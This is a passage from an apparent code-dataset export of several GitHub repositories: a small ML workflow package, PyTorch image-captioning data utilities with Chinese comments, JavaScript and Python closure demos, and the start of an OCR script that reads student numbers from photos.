"blob_id": "5371343733dc63352f187d675f15d0eb221254e7", "content_id": "f9f7316a359e127006c8b4d1e2e38e19d6da019c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3365, "license_type": "permissive", "max_line_length": 262, "num_lines": 107, "path": "/README.md", "repo_name": "ClaudioDavi/dagscience", "src_encoding": "UTF-8", "text": "# DAGSCIENCE\n#### Machine Learning Engineering Workflow Simplified\n\nWhen building machine learning workflows I always end up using the same scaffolding for my projects. 
The data has always some flow that it has to go through before turning into a usable Machine Learning Model.\n\nThis soon-to-be package comes to help those in need of a new structure for their engineering workflows.\n\nA Directed Acyclic Graph is a finite graph with no cycles in which data flows in only one direction. If you squint really hard, you can see that most model building in machine learning workflows follow the same rules, data-in/model-out with a lot of in-betweens.\n\nThis is a non-opinionated and non-invasive package that relies on pure python to work. I have set as a ground rule so that I can use it in my serverless functions where I always have to optimize for package size.\n\nTo use the package for now, you must clone it inside your repository and run: \n`pip install .`\n\nFrom there is up to you. Here's an example to help you out:\n\n```python\nimport os\nimport warnings\n\nimport pandas as pd\nfrom sklearn.ensemble import GradientBoostingRegressor\nimport sklearn\nfrom sklearn.exceptions import DataConversionWarning\n\n\nfrom dagscience import workflow\nimport joblib\n \nwarnings.filterwarnings(action='ignore', category=DataConversionWarning)\n\n\nclass TaskGetDataConcrete(workflow.TaskGetData):\n def __init__(self):\n pass\n\n def save(self, data, *args, **kwargs):\n data.to_csv(\"data.csv\", index=False)\n return data\n\n def load_from_source(self):\n # Loads literacy rate dataset\n data = pd.read_csv(\"https://query.data.world/s/ohtb5dg6ik6pr7vvylm2yqtwaf5aqs\")\n return self.save(data)\n \n\n def load_from_filesystem(self):\n if os.path.exists(\"data.csv\"):\n return pd.read_csv(\"data.csv\")\n else:\n raise FileNotFoundError()\n\n\nclass TaskPreprocessConcrete(workflow.TaskPreprocess):\n def __init__(self, *args, **kwargs):\n pass\n\n def run(self, data):\n data.drop([\"Country\", \"Name\"], axis=1, inplace=True)\n data.iloc[:, [0, 2, 3, 4, 5]] = sklearn.preprocessing.scale(data.iloc[:, [0, 2, 3, 4, 5]])\n return data.sample(frac=1)\n\n\nclass TaskTrainConcrete(workflow.TaskTrain):\n def __init__(self, *args, **kwargs):\n pass\n\n def build_model(self, *args, **kwargs):\n return GradientBoostingRegressor()\n\n def run(self, model, data):\n X = data.iloc[:, [0, 2, 3, 4, 5]]\n model.fit(X=X, y=data[\"Literacy\"])\n return model\n\n\nclass TaskSaveModelConcrete(workflow.TaskSaveModel):\n def __init__(self):\n pass\n\n def save(self, model):\n joblib.dump(model, \"model\")\n\n def load(self):\n if os.path.exists('model'):\n return joblib.load(\"model\")\n else:\n raise FileNotFoundError()\n\n\nif __name__ == \"__main__\":\n import logging\n logging.basicConfig(level=logging.DEBUG)\n model = workflow.DagflowCycle(\n task_get_data=TaskGetDataConcrete(),\n task_preprocess=TaskPreprocessConcrete(),\n task_train=TaskTrainConcrete(),\n task_model_saver=TaskSaveModelConcrete(),\n ).run()\n print(\"Prediction of Literacy Rate: \", model.predict([[-0.466107, -0.445900,\t0.794243, -0.257518, -0.714468]])[0])\n```\n\n## Roadmap:\n* Re-execute step\n* Tests\n* Upload to pypi\n* CI" }, { "alpha_fraction": 0.6530054807662964, "alphanum_fraction": 0.6612021923065186, "avg_line_length": 32.272727966308594, "blob_id": "9d45d49cdb199c08d09f12e25576d873861b8f53", "content_id": "2d4cb5db392c3b3da3bac4608ea1db77a95d62ba", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 366, "license_type": "permissive", "max_line_length": 69, "num_lines": 11, "path": "/setup.py", "repo_name": "ClaudioDavi/dagscience", "src_encoding": "UTF-8", 
"text": "from setuptools import setup, find_packages\n\nsetup(name='dagscience',\n version='0.1.0beta',\n description='Machine Learning Engineering Workflow Simplified',\n url='http://github.com/claudiodavi/dagscience',\n author='Claudio Davi',\n author_email='[email protected]',\n license='MIT',\n packages=find_packages(exclude=[\"tests\"]),\n zip_safe=False)\n" }, { "alpha_fraction": 0.5262601375579834, "alphanum_fraction": 0.5326048731803894, "avg_line_length": 34.02469253540039, "blob_id": "5e3e4673bfa8b95da7c3daa8dff0e1161d3e71a4", "content_id": "9e1cf669711fcce6076bb69522737af106617ff5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2837, "license_type": "permissive", "max_line_length": 85, "num_lines": 81, "path": "/dagscience/step_manager.py", "repo_name": "ClaudioDavi/dagscience", "src_encoding": "UTF-8", "text": "import logging\nimport os\nimport configparser\nimport traceback\n\n\nclass Step():\n \"\"\"\n Steps to be executed to create the machine learning model\n \"\"\"\n logger = logging.getLogger(__name__)\n default = {\n \"STEPS\": {\n \"STEP_1\": 'ready',\n \"STEP_2\": 'ready',\n \"STEP_3\": 'ready'\n }\n }\n\n def __init__(self, get_data, preprocess, train, model_saver):\n self.data_class = get_data\n self.preprocess_class = preprocess\n self.train_class = train\n self.model_class = model_saver\n\n def execute_steps(self, step_1=True, step_2=True, step_3=True):\n data = self.step_get_data(step_1)\n data = self.step_preprocess(data, step_2)\n model = self.step_train(data, step_3)\n return model\n\n def step_get_data(self, execute):\n self.logger.info('=============================================')\n self.logger.info('Step 1: Loading Data')\n if not execute:\n self.logger.info(\n 'Step 1: Not getting new data, loading from file system directly')\n return self.data_class.load_from_filesystem()\n else:\n self.logger.info(\n 'Step 1: Loading data from original source and saving to filesystem')\n data = self.data_class.load_from_source()\n self.data_class.save(data)\n return data\n\n def step_preprocess(self, data, execute):\n self.logger.info('=============================================')\n self.logger.info('Step 2: Preprocess')\n if not execute:\n self.logger.info('Step 2: Not preprocessing')\n return data\n else:\n self.logger.info(\"Step 2: Starting preprocessing step\")\n return self.preprocess_class.run(data)\n\n def step_train(self, data, execute):\n self.logger.info('=============================================')\n self.logger.info('Step 3: Training Model')\n if not execute:\n self.logger.info(\n 'Step 3: Not using training, loading model from file system')\n return self.model_class.load()\n else:\n self.logger.info('Step 3: Building and training model')\n model = self.train_class.build_model()\n model = self.train_class.run(model, data)\n self.model_class.save(model)\n return model\n\n def step_writer(self):\n config = configparser.ConfigParser()\n if os.path.exists('.steps'):\n config.read('.steps')\n print(config.sections)\n else:\n with open('.steps', 'w') as configfile:\n try:\n config.read_dict(self.default)\n config.write(configfile)\n except Exception as ex:\n traceback.print_stack()\n" } ]
6
Zora-zjj/pytorch-tutorial
https://github.com/Zora-zjj/pytorch-tutorial
db75a4576f7e20673cadb64e704f8922d8bfc7e5
768a5f2d19dc14e79de3cae31663096a6593b4ac
dd9e7a51d6706093227f4417bc8ff5a885b9ee95
refs/heads/master
2021-07-20T21:08:52.043288
2020-08-31T03:29:53
2020-08-31T03:29:53
210,796,789
0
0
MIT
2019-09-25T08:41:40
2019-09-25T08:40:02
2019-09-15T19:12:19
null
[ { "alpha_fraction": 0.560742974281311, "alphanum_fraction": 0.570950448513031, "avg_line_length": 57.01941680908203, "blob_id": "a3ac56ae42fd2b2e5cf91d9902ea797a04bbba7", "content_id": "d72aacf34176c24c176a476cf91d99d8bfc7e2a4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6788, "license_type": "permissive", "max_line_length": 147, "num_lines": 103, "path": "/tutorials/03-advanced/image_captioning/data_loader.py", "repo_name": "Zora-zjj/pytorch-tutorial", "src_encoding": "UTF-8", "text": "import torch\r\nimport torchvision.transforms as transforms\r\nimport torch.utils.data as data # torch.utils.data mainly provides three classes: Dataset / sampler.Sampler / DataLoader\r\nimport os\r\nimport pickle\r\nimport numpy as np\r\nimport nltk\r\nfrom PIL import Image\r\nfrom build_vocab import Vocabulary\r\nfrom pycocotools.coco import COCO\r\n\r\n\r\nclass CocoDataset(data.Dataset): # COCO dataset built on data.Dataset; args: paths, vocabulary, transform\r\n \"\"\"COCO Custom Dataset compatible with torch.utils.data.DataLoader.\"\"\"\r\n def __init__(self, root, json, vocab, transform=None):\r\n \"\"\"Set the path for images, captions and vocabulary wrapper.\r\n \r\n Args:\r\n root: image directory.\r\n json: coco annotation file path.\r\n vocab: vocabulary wrapper.\r\n transform: image transformer.\r\n \"\"\"\r\n self.root = root\r\n self.coco = COCO(json)\r\n self.ids = list(self.coco.anns.keys()) # ids: the annotation ids\r\n self.vocab = vocab\r\n self.transform = transform\r\n\r\n def __getitem__(self, index): # index is the position of an annotation id; returns one (image, caption word-id list) pair\r\n \"\"\"Returns one data pair (image and caption).\"\"\"\r\n coco = self.coco # the COCO object, coco = COCO(json_file)\r\n vocab = self.vocab\r\n ann_id = self.ids[index] # one caption id\r\n caption = coco.anns[ann_id]['caption'] # the caption string\r\n img_id = coco.anns[ann_id]['image_id'] # the image id paired with this caption\r\n path = coco.loadImgs(img_id)[0]['file_name'] # coco.loadImgs looks up image info by id; file_name is the image file name; [0] because loadImgs returns a list\r\n image = Image.open(os.path.join(self.root, path)).convert('RGB') # os.path.join builds the image path; the file must be opened by path, not by id\r\n \r\n if self.transform is not None:\r\n image = self.transform(image) # image preprocessing\r\n\r\n # Convert caption (string) to word ids. caption → target\r\n tokens = nltk.tokenize.word_tokenize(str(caption).lower()) # tokenize this caption\r\n caption = []\r\n caption.append(vocab('<start>')) # vocab is a Vocabulary instance; vocab(word) goes through __call__ and returns the word id\r\n caption.extend([vocab(token) for token in tokens])\r\n caption.append(vocab('<end>')) # caption is now a sequence of ids\r\n target = torch.Tensor(caption) # caption → target\r\n return image, target # the image and its caption as a word-id list\r\n\r\n def __len__(self): # __len__ reports the dataset size\r\n return len(self.ids) \r\n\r\n\r\ndef collate_fn(data): # data: the (image, target) pairs returned above; batches them and pads the captions\r\n \"\"\"Creates mini-batch tensors from the list of tuples (image, caption).\r\n We should build custom collate_fn rather than using default collate_fn, \r\n because merging caption (including padding) is not supported in default.\r\n Args:\r\n data: list of tuples (image, caption).\r\n - image: torch tensor of shape (3, 256, 256).\r\n - caption: torch tensor of shape (?); variable length.\r\n Returns:\r\n images: torch tensor of shape (batch_size, 3, 256, 256).\r\n targets: torch tensor of shape (batch_size, padded_length); entries are word ids, padded with zeros.\r\n lengths: list; valid length for each padded caption.\r\n \"\"\"\r\n # Sort a data list by caption length (descending order).\r\n data.sort(key=lambda x: len(x[1]), reverse=True) # list.sort(key=None, reverse=False): key extracts the comparison value; reverse=True sorts longest caption first\r\n images, captions = zip(*data) # zip() packs into tuples; zip(*) unpacks back into separate sequences\r\n\r\n # Merge images (from tuple of 3D tensor to 4D tensor).\r\n images = torch.stack(images, 0) # stack the images into a 4D tensor along dim 0\r\n\r\n # Merge captions (from tuple of 1D tensor to 2D tensor). # stack the captions into a 2D tensor\r\n lengths = [len(cap) for cap in captions] # true length of each caption\r\n targets = torch.zeros(len(captions), max(lengths)).long() # batched caption tensor, zero-initialized then filled\r\n for i, cap in enumerate(captions):\r\n end = lengths[i]\r\n targets[i, :end] = cap[:end] # copy the word ids into targets; the padded tail stays 0\r\n return images, targets, lengths \r\n\r\ndef get_loader(root, json, vocab, transform, batch_size, shuffle, num_workers):\r\n \"\"\"Returns torch.utils.data.DataLoader for custom coco dataset.\"\"\"\r\n # COCO caption dataset\r\n coco = CocoDataset(root=root,\r\n json=json,\r\n vocab=vocab,\r\n transform=transform)\r\n \r\n # Data loader for COCO dataset\r\n # This will return (images, captions, lengths) for each iteration.\r\n # images: a tensor of shape (batch_size, 3, 224, 224).\r\n # captions: a tensor of shape (batch_size, padded_length).\r\n # lengths: a list indicating valid length for each caption. length is (batch_size).\r\n data_loader = torch.utils.data.DataLoader(dataset=coco, # dataset (Dataset): the dataset to load from\r\n batch_size=batch_size, # batch_size (int, optional): how many samples per batch\r\n shuffle=shuffle, # shuffle (bool, optional): when True, reshuffle the data every epoch (default: False)\r\n num_workers=num_workers, # num_workers (int, optional): number of subprocesses for loading; 0 loads in the main process (default: 0)\r\n collate_fn=collate_fn) # collate_fn (callable, optional): merges a list of samples to form a mini-batch; here the custom collate_fn defined above\r\n return data_loader\r\n" }, { "alpha_fraction": 0.5829439163208008, "alphanum_fraction": 0.5919976830482483, "avg_line_length": 44.6533317565918, "blob_id": "0af7b75d7390d5b3d9a5c5defc0d2fcea7a782c", "content_id": "23fd3254bc9fca2a2dbc8505d2c1e446f0e129a6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3954, "license_type": "permissive", "max_line_length": 124, "num_lines": 75, "path": "/tutorials/03-advanced/image_captioning/build_vocab.py", "repo_name": "Zora-zjj/pytorch-tutorial", "src_encoding": "UTF-8", "text": "import nltk\r\nimport pickle\r\nimport argparse # argparse: the standard Python module for command-line options, arguments and sub-commands\r\nfrom collections import Counter\r\nfrom pycocotools.coco import COCO # pycocotools: Microsoft's library for loading COCO annotation data\r\n\r\nclass Vocabulary(object):\r\n \"\"\"Simple vocabulary wrapper.\"\"\"\r\n def __init__(self):\r\n self.word2idx = {} \r\n self.idx2word = {}\r\n self.idx = 0\r\n\r\n def add_word(self, word): \r\n if not word in self.word2idx:\r\n self.word2idx[word] = self.idx # build the word2idx and idx2word indices\r\n self.idx2word[self.idx] = word\r\n self.idx += 1\r\n\r\n def __call__(self, word):\r\n if not word in self.word2idx:\r\n return self.word2idx['<unk>'] \r\n return self.word2idx[word]\r\n\r\n def __len__(self):\r\n return len(self.word2idx)\r\n\r\ndef build_vocab(json, threshold):\r\n \"\"\"Build a simple vocabulary wrapper.\"\"\"\r\n coco = COCO(json) # build the COCO object, coco = pycocotools.coco.COCO(json_file)\r\n counter = Counter() # word-frequency counter: word -> count\r\n ids = coco.anns.keys() # the annotation ids\r\n for i, id in enumerate(ids): \r\n caption = str(coco.anns[id]['caption']) # fetch the caption\r\n tokens = nltk.tokenize.word_tokenize(caption.lower()) # word_tokenize splits the caption into tokens\r\n counter.update(tokens) # add the tokens to the counter\r\n\r\n if (i+1) % 1000 == 0:\r\n print(\"[{}/{}] Tokenized the captions.\".format(i+1, len(ids))) # progress: how many captions have been tokenized\r\n\r\n # If the word frequency is less than 'threshold', then the word is discarded.\r\n words = [word for word, cnt in counter.items() if cnt >= threshold] # cnt is the count; keep only the words at or above the threshold\r\n\r\n # Create a vocab wrapper and add some special tokens.\r\n vocab = Vocabulary()\r\n vocab.add_word('<pad>') \r\n vocab.add_word('<start>')\r\n vocab.add_word('<end>')\r\n vocab.add_word('<unk>')\r\n\r\n \r\n for i, word in enumerate(words):\r\n vocab.add_word(word) \r\n return vocab # the finished vocabulary\r\n\r\ndef main(args): # args: caption path, save path, threshold\r\n vocab = build_vocab(json=args.caption_path, threshold=args.threshold) # 'data/annotations/captions_train2014.json', 4\r\n vocab_path = args.vocab_path # path the vocabulary will be saved to # './data/vocab.pkl'\r\n with open(vocab_path, 'wb') as f: \r\n pickle.dump(vocab, f) # pickle.dump(obj, file[, protocol]) serializes obj into file; protocol selects the pickle format (default 0)\r\n print(\"Total vocabulary size: {}\".format(len(vocab)))\r\n print(\"Saved the vocabulary wrapper to '{}'\".format(vocab_path))\r\n\r\n\r\nif __name__ == '__main__': # runs only when build_vocab.py is executed directly, not when it is imported\r\n parser = argparse.ArgumentParser() # create an ArgumentParser object; it holds all the information needed to parse the command line into Python types\r\n parser.add_argument('--caption_path', type=str, # add a program argument to the parser # type\r\n default='data/annotations/captions_train2014.json', # value used when the option is absent from the command line\r\n help='path for train annotation file') # a short description of what the option does\r\n parser.add_argument('--vocab_path', type=str, default='./data/vocab.pkl', \r\n help='path for saving vocabulary wrapper')\r\n parser.add_argument('--threshold', type=int, default=4, \r\n help='minimum word count threshold')\r\n args = parser.parse_args() # parse the arguments with parse_args()\r\n main(args)\r\n" }, { "alpha_fraction": 0.5933666229248047, "alphanum_fraction": 0.6079055070877075, "avg_line_length": 51.404762268066406, "blob_id": "548c484d0d46956b3ad35b427eb9c39016ca71c9", "content_id": "e5dfc183fde09a7d437a7555e85c5c9d701fc8b7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2531, "license_type": "permissive", "max_line_length": 132, "num_lines": 42, "path": "/tutorials/03-advanced/image_captioning/resize.py", "repo_name": "Zora-zjj/pytorch-tutorial", "src_encoding": "UTF-8", "text": "import argparse\r\nimport os\r\nfrom PIL import Image\r\n\r\n\r\ndef resize_image(image, size): # resize a single image\r\n \"\"\"Resize an image to the given size.\"\"\"\r\n return image.resize(size, Image.ANTIALIAS) # resize to the given size; Image.ANTIALIAS selects the high-quality filter\r\n\r\ndef resize_images(image_dir, output_dir, size): # resize the images in bulk and save them to output_dir\r\n \"\"\"Resize the images in 'image_dir' and save into 'output_dir'.\"\"\"\r\n if not os.path.exists(output_dir): # os.path.exists checks whether the given path exists\r\n os.makedirs(output_dir) # os.makedirs(path, mode=0o777) creates the directory recursively; mode sets the permissions\r\n\r\n images = os.listdir(image_dir) # os.listdir(path) lists the files and folders inside the directory\r\n num_images = len(images)\r\n for i, image in enumerate(images):\r\n with open(os.path.join(image_dir, image), 'r+b') as f: # os.path.join joins two or more path components\r\n with Image.open(f) as img:\r\n img = resize_image(img, size)\r\n img.save(os.path.join(output_dir, image), img.format) # save, keeping the original image format\r\n if (i+1) % 100 == 0:\r\n print (\"[{}/{}] Resized the images and saved into '{}'.\"\r\n .format(i+1, num_images, output_dir))\r\n\r\ndef main(args): # args: the parsed arguments\r\n image_dir = args.image_dir # './data/train2014/'\r\n output_dir = args.output_dir # './data/resized2014/'\r\n image_size = [args.image_size, args.image_size] # 256\r\n resize_images(image_dir, output_dir, image_size)\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser() # create the command-line argument parser, an ArgumentParser object\r\n 
parser.add_argument('--image_dir', type=str, default='./data/train2014/', #add_argument:读入命令行参数,\n help='directory for train images') \n parser.add_argument('--output_dir', type=str, default='./data/resized2014/',\n help='directory for saving resized images')\n parser.add_argument('--image_size', type=int, default=256,\n help='size for image after processing')\n args = parser.parse_args() #parse_args(args=None, nampespace=None)将之前add_argument()定义的参数args进行赋值namespace,并返回namespace\n main(args)\n" } ]
3
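A note on the data_loader.py record above: its custom collate_fn exists because default collation cannot pad variable-length captions, and it deliberately sorts each batch by caption length in descending order. Below is a minimal usage sketch of the get_loader() that record defines. The paths mirror the repo's own defaults, but the transform values, batch size, and the training-loop fragment are illustrative assumptions, not code from the repo:

```python
# Hypothetical usage sketch for the get_loader() defined in the record above.
# Assumes the repo layout (data_loader.py, build_vocab.py, ./data/vocab.pkl).
import pickle
import torchvision.transforms as transforms
from torch.nn.utils.rnn import pack_padded_sequence

from data_loader import get_loader
from build_vocab import Vocabulary  # needed so pickle can restore the vocab object

with open('./data/vocab.pkl', 'rb') as f:
    vocab = pickle.load(f)

transform = transforms.Compose([
    transforms.RandomCrop(224),   # resized2014 images are 256x256, so 224 crops fit
    transforms.ToTensor(),
])

loader = get_loader('./data/resized2014',
                    'data/annotations/captions_train2014.json',
                    vocab, transform, batch_size=32, shuffle=True, num_workers=2)

for images, targets, lengths in loader:
    # collate_fn already sorted lengths in descending order, which is exactly
    # what pack_padded_sequence requires; pad positions in targets are 0 (<pad>).
    packed = pack_padded_sequence(targets, lengths, batch_first=True)
    break  # one batch is enough for the sketch
```

The descending sort inside collate_fn is not cosmetic: pack_padded_sequence rejects unsorted lengths unless told otherwise, which is why the loader does the sorting once per batch.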
KentaroUeda/PythonClosure
https://github.com/KentaroUeda/PythonClosure
b9f5d2d39b5174225de79acf8ca650e5b8706b75
6cb91e7b46de76f00f6ef559f78ba078dc7f4873
843001d55b08d3ff7f38e212cf60d47b16e3607a
refs/heads/master
2019-06-10T12:22:26.852080
2016-04-18T03:04:48
2016-04-18T03:04:48
56,378,852
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.41813185811042786, "alphanum_fraction": 0.4664835035800934, "avg_line_length": 20.162790298461914, "blob_id": "5424e46b2e90a0d0c6205a85fb49084640253358", "content_id": "8205c6e0a71b12f7042bc627ff5439afbe74571a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1822, "license_type": "no_license", "max_line_length": 65, "num_lines": 86, "path": "/JavaScriptClosure.js", "repo_name": "KentaroUeda/PythonClosure", "src_encoding": "UTF-8", "text": "\nvar closureCalclator = function(par1, par2){\n \n 'use strict'\n \n var setter, getter, add, sub, multi, div, original,\n param1 = par1,\n param2 = par2\n ;\n \n setter = function(p1, p2){\n param1 = p1;\n param2 = p2;\n return {param1:param1, param2:param2};\n };\n \n getter = function(){\n return {param1:param1, param2:param2};\n };\n \n add = function(){\n return param1 + param2;\n };\n \n sub = function(){\n return param1 - param2;\n };\n \n multi = function(){\n return param1 * param2;\n };\n \n div = function(){\n return parseFloat(param1) / param2;\n };\n \n original = function(func){\n return func(param1, param2);\n };\n \n return {\n setter :setter,\n getter :getter,\n add :add,\n sub :sub,\n multi :multi,\n div :div,\n original:original\n };\n \n};\n\n\n(function main(){\n \n 'use strict'\n \n var dot,\n cc1 = closureCalclator(10, 20),\n cc2 = closureCalclator(30, 40)\n ;\n \n dot = function(a, b){\n return a*a + b*b;\n }\n \n console.log(cc1.getter()); // [ 10, 20 ]\n console.log(cc1.add());  // 30\n console.log(cc1.setter(1, 2)); // { param1: 1, param2: 2 }\n console.log(cc1.add()); // 3\n console.log(cc1.sub()); // -1\n console.log(cc1.getter()); // { param1: 1, param2: 2 }\n \n console.log('');\n \n console.log(cc2.getter()); // [ 30, 40 ]\n console.log(cc2.multi()); // 1200\n console.log(cc2.div()); // 0.75\n\n console.log( \n cc2.original(function(x, y){ return x*x + y*y; }) // 2500\n );\n console.log(cc2.original(dot)); // 2500\n \n console.log('--------------------');\n \n})();" }, { "alpha_fraction": 0.7564516067504883, "alphanum_fraction": 0.7661290168762207, "avg_line_length": 37.75, "blob_id": "a000a7dd9f879ead46dbadedd02aeadafea1e335", "content_id": "f4c83974e71a086f6a6460ae504b9afbc09b819c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 806, "license_type": "no_license", "max_line_length": 133, "num_lines": 16, "path": "/README.md", "repo_name": "KentaroUeda/PythonClosure", "src_encoding": "UTF-8", "text": "### PythonClosure\n高階関数を利用したサンプルプログラムを Python と Node.js で作成しました.\n\n- [Python 版](https://github.com/KentaroUeda/PythonClosure/blob/master/pythonClosure.py)\n\n- [JavaScript 版](https://github.com/KentaroUeda/PythonClosure/blob/master/JavaScriptClosure.js)\n\n##### 参考文献\n\n- [高階関数: 関数のネスト、クロージャ](http://bacspot.dip.jp/virtual_link/www/si.musashi-tech.ac.jp/new_www/Python_IntroProgramming/03/index-2c.html)\n\n- [関数型プログラミング HOWTO](http://docs.python.jp/2/howto/functional.html)\n\n- [ラムダ (lambda) による匿名関数の作成](http://python.keicode.com/lang/functions-lambda.php)\n\n- [JavaScript によるオブジェクト指向プログラミング](http://keicode.com/script/scr24.php)\n" }, { "alpha_fraction": 0.4442614018917084, "alphanum_fraction": 0.49093905091285706, "avg_line_length": 24.521127700805664, "blob_id": "febf72079456278f59fabb5826b05f1df044936b", "content_id": "3b7d6318aff5a595bb3eb6b4cf073416220e8093", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2001, 
"license_type": "no_license", "max_line_length": 78, "num_lines": 71, "path": "/pythonClosure.py", "repo_name": "KentaroUeda/PythonClosure", "src_encoding": "UTF-8", "text": "# coding:utf-8\n\ndef closureCalclator(par1, par2):\n \n # 関数内グローバル変数は以下のように dict 型で定義するしかない?\n globalVal = {\n 'param1':par1,\n 'param2':par2\n }\n \n def setter(p1, p2):\n globalVal['param1'] = p1\n globalVal['param2'] = p2\n return globalVal\n \n def getter():\n return {'param1' : globalVal['param1'], 'param2': globalVal['param2']}\n \n def add():\n return globalVal['param1'] + globalVal['param2']\n \n def sub():\n return globalVal['param1'] - globalVal['param2']\n \n def multi():\n return globalVal['param1'] * globalVal['param2']\n \n def div():\n return float(globalVal['param1']) / globalVal['param2']\n \n def original(func):\n return func(globalVal['param1'], globalVal['param2'])\n \n return {\n 'setter' :setter,\n 'getter' :getter,\n 'add' :add,\n 'sub' :sub,\n 'multi' :multi,\n 'div' :div,\n 'original':original\n }\n\n\nif __name__ == \"__main__\":\n \n cc1 = closureCalclator(10, 20)\n cc2 = closureCalclator(30, 40)\n \n def dot(a, b):\n return a*a + b*b\n \n print cc1['getter']() # (10, 20)\n print cc1['add']() # 30\n print cc1['setter'](1, 2) # {'param2': 2, 'param1': 1}\n print cc1['add']() # 3\n print cc1['sub']() # -1\n print cc1['getter']() # {'param2': 2, 'param1': 1}\n \n print ''\n \n print cc2['getter']() # (30, 40)\n print cc2['multi']() # 1200\n print cc2['div']() # 0.75\n \n # JavaScript のように,無名関数に複数ステップの処理をさせるのはできない?\n # dot 関数のように,通常の関数として記述しそれを引数として与えればできる.\n print cc2['original'](lambda x, y: x*x + y*y) # 2500\n print cc2['original'](dot) # 2500\n \n print '--------------------'\n \n " } ]
3
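One remark on the pythonClosure.py record above: a comment in it asks whether a dict is the only way to give nested functions writable shared state. In Python 3 it is not — `nonlocal` rebinds enclosing-scope names directly. A minimal sketch under that assumption (Python 3 only, so not a drop-in change for this Python 2 repo):

```python
# Python 3 alternative to the dict-based closure state used in pythonClosure.py.
# 'nonlocal' lets setter() rebind variables in the enclosing function's scope.
def closure_calculator(par1, par2):
    param1, param2 = par1, par2

    def setter(p1, p2):
        nonlocal param1, param2  # rebind the enclosing variables directly
        param1, param2 = p1, p2
        return {'param1': param1, 'param2': param2}

    def add():
        return param1 + param2

    return {'setter': setter, 'add': add}

cc = closure_calculator(10, 20)
print(cc['add']())    # 30
cc['setter'](1, 2)
print(cc['add']())    # 3
```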
TurnA-Lab/auto-rename-pic
https://github.com/TurnA-Lab/auto-rename-pic
9452074c8cee80df39eaa55ef5418674c2ed4ae3
93659243754586775765bb888a8daf31b1e48fb7
d3ceeb4998e112193793e00a83131ef0018f3dcc
refs/heads/master
2023-04-13T00:08:40.035178
2020-12-10T14:48:17
2020-12-10T14:48:17
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4937114715576172, "alphanum_fraction": 0.5067817568778992, "avg_line_length": 29.148698806762695, "blob_id": "17772a240f30487a5a61a293bd4a5e3f90edd9fe", "content_id": "7c3f8a412affc723be0311653e23c9e7b9ef6d77", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8956, "license_type": "no_license", "max_line_length": 119, "num_lines": 269, "path": "/pick_stu_number.py", "repo_name": "TurnA-Lab/auto-rename-pic", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = 'iskye'\n\nimport os\nimport re\nimport string\nfrom shutil import copyfile\nfrom typing import List\n\nimport beeprint\nimport cv2\nimport numpy\nfrom cnocr import CnOcr\nfrom cnstd import CnStd\nfrom tqdm import tqdm\n\n\nclass PickStuNumber:\n def __init__(self, path: str, show_img: bool = False):\n self.__ext = {'jpg', 'jpeg'}\n self.__ocr = CnOcr(model_name='densenet-lite-gru', cand_alphabet=string.digits, name=path)\n self.__std = CnStd(name=path)\n self.__info_dict = {}\n self.__dup_name_dict = {}\n\n # 先对路径进行替换\n path = self.__format_path(path)\n\n # 根据传入的路径判断操作\n if os.path.isdir(path) or os.path.isfile(path):\n files = [self.__format_path(os.path.join(path, f)) for f in os.listdir(path) if\n (os.path.isfile(os.path.join(path, f)) and self.__is_image(f))] \\\n if os.path.isdir(path) \\\n else [path]\n for file in tqdm(files):\n self.__handle_info(file,\n self.__ocr_number(self.__std_number(self.__cutter(file, show_img))))\n else:\n print(f'获取数据错误,“{path}”既不是文件也不是文件夹')\n\n @staticmethod\n def __format_path(path: str):\n return os.path.abspath(path).replace('\\\\', '/')\n\n @staticmethod\n def __get_suffix(path: str) -> str:\n \"\"\"\n 获取后缀\n :param path: 图片路径\n :return: 是否为图片\n \"\"\"\n return path.split('.')[-1]\n\n def __is_image(self, path: str) -> bool:\n return self.__get_suffix(path) in self.__ext\n\n @staticmethod\n def __cutter(path: str, show_img: bool = False) -> numpy.ndarray:\n \"\"\"\n 切割图片\n :param path: 图片路径\n :param show_img: 是否需要展示图片\n :return: 图片对应的 ndarray\n \"\"\"\n print(path)\n\n # 以灰度模式读取图片\n origin_img = cv2.imread(path, 0)\n\n if show_img:\n # 自由拉伸窗口\n # cv2.namedWindow('bin img', 0)\n cv2.imshow('origin img', origin_img)\n\n # 切出一部分,取值是经验值\n origin_img = origin_img[:origin_img.shape[0] // 2]\n\n # 二值化\n _, origin_img = cv2.threshold(origin_img, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n\n if show_img:\n # 自由拉伸窗口\n # cv2.namedWindow('bin img', 0)\n cv2.imshow('bin img', origin_img)\n\n # 形态学转换,主要为了检测出那个红色的 banner\n kernel = numpy.ones((15, 15), dtype=numpy.uint8)\n # img = cv2.erode(img, kernel=kernel, iterations=1)\n img = cv2.dilate(origin_img, kernel=kernel, iterations=2)\n\n # 边缘检测\n contours, _ = cv2.findContours(img, 1, 2)\n # 找出第二大的,即红色的 banner\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n\n if len(contours) > 1:\n # 获取包围 banner 的矩形数据\n x, y, w, h = cv2.boundingRect(contours[1])\n\n # 目前所有的数值设定使用的是经验值\n if w * h > 250000:\n # 需要识别的学号部分\n # 左上角坐标\n left_top_x = x\n left_top_y = y + h + 20\n # 右下角坐标\n right_down_x = x + w\n right_down_y = y + h + 190\n\n img = origin_img[left_top_y:right_down_y, left_top_x:right_down_x]\n else:\n img = origin_img[120:]\n else:\n img = origin_img[120:]\n\n # 